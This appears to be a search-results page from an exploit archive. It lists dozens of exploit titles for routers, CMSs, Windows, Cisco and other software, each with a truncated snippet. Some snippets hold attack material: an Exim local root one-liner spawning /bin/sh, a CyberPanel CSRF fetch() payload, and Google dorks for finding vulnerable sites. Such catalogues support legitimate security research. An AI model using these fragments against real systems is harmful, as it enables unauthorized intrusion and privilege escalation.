41207 matches found
EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution Date: 2020-02-01 Exploit Author: Clément Billac Vendor Homepage: https://www.eyesofnetwork.com/ Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x8664-bin.iso Version: 5.3 CVE :...
Genexis Platinum-4410 2.1 - Authentication Bypass
Genexis Platinum-4410 2.1 - Authentication Bypass Exploit Title: Genexis Platinum-4410 2.1 - Authentication Bypass Date: 20220-01-08 Exploit Author: Husinul Sanub Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/ Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Route...
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation
Nagios XI 5.5.6 - Remote Code Execution Privilege Escalation Exploit Title: Nagios XI 5.5.6 Remote Code Execution and Privilege Escalation Date: 2019-01-22 Exploit Author: Chris Lyne @lynerc Vendor Homepage: https://www.nagios.com/ Product: Nagios XI Software Link:...
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection
PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection Exploit Title: PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection Dork: N/A Date: 2018-10-29 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/users/janobe Software Link:...
yahoo.com
Pentest notes for: google.com Exploit Pack Nmap 7.70 scan initiated Mon Sep 24 23:08:15 2018 as: C:\Program Files x86\Nmap\nmap.exe -sV -A -oA log/google.com google.com Nmap scan report for google.com 172.217.19.206 Host is up 0.027s latency. rDNS record for 172.217.19.206:...
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation SystemCollector PoC for Privilege Escalation in Windows 10 Diagnostics Hub Standard Collector Service Affected Products Windows 10 Windows Server Windows Server 2016 Visual Studio 2015 Update 3 Visual Studio 20...
Tenda AC15 Router - Remote Code Execution
Tenda AC15 Router - Remote Code Execution !/usr/bin/env python EDB Note Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/ import urllib2 import struct import time import socket from optparse import import SimpleHTTPServer import SocketServer import threading import sys...
System Shield 5.0.0.136 - Privilege Escalation
System Shield 5.0.0.136 - Privilege Escalation / Exploit Title - System Shield AntiVirus & AntiSpyware Arbitrary Write Privilege Escalation Date - 29th January 2018 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.iolo.com/ Tested Version - 5.0.0.136 Driver Version - 5.4.11.1 ...
Cisco IOS - Remote Code Execution
Cisco IOS - Remote Code Execution !/usr/bin/env python if False: ''' CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution =================== This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco...
Microsoft Windows 10 - nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry) Pool Memory Disclosure
Microsoft Windows 10 - nt!NtQueryDirectoryFile luafv!LuafvCopyDirectoryEntry Pool Memory Disclosure / Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1361 We have discovered that the nt!NtQueryDirectoryFile system call discloses portions of uninitialized pool memory to user-mode...
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation
WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation /Functions/UpdateAdmin-Databases.php file. Remote attackers are able to request crafted data of the POST method request with the vulnerable ´accesrole´ parameter. The security risk of the privilege scalation web vulnerability ...
Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...
Google Android - Stagefright Remote Code Execution
Google Android - Stagefright Remote Code Execution !/usr/bin/env python Joshua J. Drake @jduck of ZIMPERIUM zLabs Shout outs to our friends at Optiv formerly Accuvant Labs C Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 www.zimperium.com Exploit for RCE Vulnerability CVE-2015-153...
Libuser Library - Multiple Vulnerabilities
Libuser Library - Multiple Vulnerabilities Qualys Security Advisory CVE-2015-3245 userhelper chfn newline filtering CVE-2015-3246 libuser passwd file handling -- Summary ----------------------------------------------------------------- The libuser library implements a standardized interface for...
phpMyBitTorrent 2.04 - Multiple Vulnerabilities
phpMyBitTorrent 2.04 - Multiple Vulnerabilities waraxe-2012-SA091 - Multiple Vulnerabilities in phpMyBitTorrent 2.04 =============================================================================== Author: Janek Vind "waraxe" Date: 01. October 2012 Location: Estonia, Tartu Web:...
Microsoft Windows - NTLM Weak Nonce (MS10-012)
Microsoft Windows - NTLM Weak Nonce MS10-012 Windows SMB NTLM Authentication Weak Nonce Vulnerability Security Advisory Hernan Ochoa [email protected] - Agustin Azubel [email protected] Title: Windows SMB NTLM Authentication Weak Nonce Vulnerability Advisory ID: OCHOA-2010-0209...
Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer
Adobe Acrobat Reader and Flash Player - newclass Invalid Pointer ''' | / |/ \ /\ | | | | \ | \ / | | | | / \ | | | | | | | |/| | | | |/ /\ | | | | ' + self.eol else: self.content += self.eol + data + self.eol self.content += 'endobj' + self.eol def objSWFStreamself, objnum, data, stream:...
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6 - HFS FileSystem Denial of Service // -----BEGIN PGP SIGNED MESSAGE----- // Hash: SHA1 / Proof of Concept for CVE-2010-0105 MacOS X 10.6 hfs file system attack Denial of Service by Maksymilian Arciemowicz from SecurityReason.com...
Joomla! Component com_yanc - SQL Injection
Joomla! Component comyanc - SQL Injection ============================================================================== » Joomla comyanc Remote Sql Injection Vulnerability ============================================================================== » Script: Joomla » Language: PHP » Founder:...
list Web - addlink.php?id SQL Injection
list Web - addlink.php?id SQL Injection | | list Web addlink.php id Remote SQL Injection Vulnerability | | |-------------------- Hussin X -------------------| | | Author: Hussin X | | Home : WwW.IQ-ty.CoM | | email: darkangelg85atYahooDoTcom | | | | | | script : http://maker.ir | | DorK :...
SeaMonkey 1.1.8 - Remote Array Overrun
SeaMonkey 1.1.8 - Remote Array Overrun From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SeaMonkey 1.1.8 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis...
ViArt CMS - forum_topic_new.php?forum_id Cross-Site Scripting
ViArt CMS - forumtopicnew.php?forumid Cross-Site Scripting source: https://www.securityfocus.com/bid/36003/info ViArt CMS is prone to multiple cross site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code...
SH-News 3.0 - comments.php SQL Injection
SH-News 3.0 - comments.php SQL Injection ...:::::SH-News 3.0 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to ...
ttCMS 4 - ez_sql.php?lib_path Remote File Inclusion
ttCMS 4 - ezsql.php?libpath Remote File Inclusion DEVIL TEAM - HACKING POLISH TEAM Author: Kacper a.k.a Rahim Contact: [email protected] Homepage: http://www.rahim.webd.pl/ Irc: irc.milw0rm.com:6667 devilteam -------------------------------------------- Pozdro dla wszystkich z kanalu IRC oraz...
YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting
YaPiG 0.9x - Thankscomment.php Cross-Site Scripting source: https://www.securityfocus.com/bid/19709/info Yapig is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may let an attacker steal cookie-based authentication credentials and...
DZCP (deV!L_z Clanportal) 1.34 - id SQL Injection
DZCP deV!Lz Clanportal 1.34 - id SQL Injection ? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo...
Microsoft IIS 5.0 - WebDAV Remote
Microsoft IIS 5.0 - WebDAV Remote // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / --------------------------------- / // /...
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection
GUnet OpenEclass 1.7.3 E-learning platform - month SQL Injection Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection Google Dork: intext:"© GUnet 2003-2007" Date: 2020-03-02 Exploit Author: emaragkos Vendor Homepage: https://www.openeclass.org/ Software Link:...
ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Date: 2019-10-17 Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link:...
CyberPanel 1.8.4 - Cross-Site Request Forgery
CyberPanel 1.8.4 - Cross-Site Request Forgery Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR
Spidermonkey - IonMonkey Type Inference is Incorrect for Constructors Entered via OSR / A bug in IonMonkeys type inference system when JIT compiling and entering a constructor function via on-stack replacement OSR allows the compilation of JITed functions that cause type confusions between...
Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal ''' Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. Vulnerabl...
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure ''' Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware Date: 20-03-2018 Exploit Author: David Castro Contact: https://twitter.com/SadFud75 Vendor Homepage: http://www.lutron.com Software Link:...
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
CodeMeter 6.50 - Cross-Site Scripting
CodeMeter 6.50 - Cross-Site Scripting Document Title: =============== Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2074 ID: FB49498 Acknowledgements:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
Liferay CE 6.2 CE GA6 - Persistent Cross-Site Scripting
Liferay CE 6.2 CE GA6 - Persistent Cross-Site Scripting CVE-2016-3670 Stored Cross Site Scripting in Liferay CE 1. Vulnerability Properties Title: Stored Cross-Site Scripting Liferay CE CVE ID: CVE-2016-3670 CVSSv3 Base Score: 4.6 AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N Vendor: Liferay Inc Products:...
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel x86 - Disable ASLR by Setting the RLIMITSTACK Resource to Unlimited Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html CVE-2016-3672 - Unlimiting the stack not longer disables ASLR Authors: Hector Marco & Ismael Ripoll CVE: CVE-2016-3672...
IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities
IBM Algorithmics RICOS 4.5.0 4.7.0 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple severe vulnerabilities product: IBM Algorithmics RICO...
Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities
Oracle WebCenter Sites FatWire Content Server - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple vulnerabilities in Oracle WebCenter Sites product: Oracle WebCenter Sites former FatWire...
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service
Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service From: http://jon.oberheide.org/files/sctp-boom.py !/usr/bin/env python ''' sctp-boom.py Linux Kernel http://jon.oberheide.org Information: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 The sctpprocessunkparam function in...
IBM AIX 5.66.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.66.1 - LIBINITDBG Arbitrary File Overwrite via Libc Debug !/bin/sh $Id: raptorlibC,v 1.1 2009/09/10 15:08:04 raptor Exp $ raptorlibC - AIX arbitrary file overwrite via libC debug Copyright c 2009 Marco Ivaldi Property of @ Mediaservice.net Srl Data Security Division...
Web Directory PRO - Admins.php Change Admin Password
Web Directory PRO - Admins.php Change Admin Password change password Web Directory PRO MODIFY Login Password TypeSubadminAdmin Categories ArtBusinessComputersGamesHealth & FitnessNewsSportsRecreationInternetTeen & KidsReferenceEducationRegionalSocietyScienceHome & FamilyWorldShoppingWeb...
Sun xVM VirtualBox 1.6.4 - Privilege Escalation (PoC)
Sun xVM VirtualBox 1.6.4 - Privilege Escalation PoC -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability Advisory Information Title: Sun xVM VirtualBox Privilege...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Squirrelcart 2.2.0 - cart_content.php Remote File Inclusion
Squirrelcart 2.2.0 - cartcontent.php Remote File Inclusion Title : Squirrelcart = 2.2.0 Remote File Inclusion URL : http://www.ldev.com/ google Dork : inurl:/squirrelcart/ Author : OLiBekaS greetz : Skulmatic, weleh, brokencode, bigmaster and all papmahackerlink crew Exploit :...
ACal 2.2.6 - day.php Remote File Inclusion
ACal 2.2.6 - day.php Remote File Inclusion $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit:...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpLinks 2.1.2 - Multiple Vulnerabilities
phpLinks 2.1.2 - Multiple Vulnerabilities phpLinks Multiple Vulnerabilities Vendor: destiney.com Product: phpLinks Version: = 2.1.2 Website: http://phplinks.sourceforge.net/ BID: 6632 6633 Description: phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link far...
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection !/usr/bin/python """ Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows 64-bit - Release: 11.21 - Release Date:...